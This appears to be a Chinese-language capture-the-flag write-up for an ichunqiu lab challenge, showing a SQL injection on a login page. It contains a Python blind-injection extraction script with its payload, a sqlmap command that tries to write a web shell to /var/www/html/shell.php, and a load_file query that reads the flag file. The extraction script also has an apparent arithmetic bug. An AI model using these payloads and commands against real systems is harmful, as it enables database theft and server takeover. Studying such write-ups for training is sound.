打开网站连接:
根据提示:
说明登录页面存在sql注入
登录后发现是空白页,抓包:
发现存在注入
最后确定是时间盲注:
放入sqlmap
找到EXP看是否能节约时间:
import requests
host = "http://eci-2zeb2vtu8vkxzo7lxcua.cloudeci1.ichunqiu.com/includes/login.php"
def getDatabase():
global host
ans=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
payload= "2' or (ascii(substr((select(user))),%d,1))<%d)-- -" % (i,mid)
param ={"user_name":payload,"user_password":"test","login":""}
res = requests.post(host,data=param,allow_redirects=False)
if res.status_code==302:
high = mid
else:
low = mid+128
mid=(low+high)//2
if mid <= 32 or mid >= 127:
break
ans += chr(mid-1)
print("database is ->"+ans)
getDatabase()
根据物理路径写入文件,好像没有写入权限
/var/www/html/single.php
命令:
python sqlmap.py -r "C:\Users\23999\Desktop\1.txt" --file-write="C:\Users\23999\Desktop\1.php" --file-dest=/var/www/html/shell.php
结果:
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
读取文件发现系统是ubuntu 18.04搭建的,但就是读不出flag
py .\sqlmap.py -r 1.txt --file-read='/flag'
利用 --sql-shell (交互式 SQL shell)使用load_file进行文件读取
python sqlmap.py -r 1.txt --sql-shell -v
sql-shell> select load_file('/flag')
flag{32efc246-b40b-44d6-92af-c9124f92364d}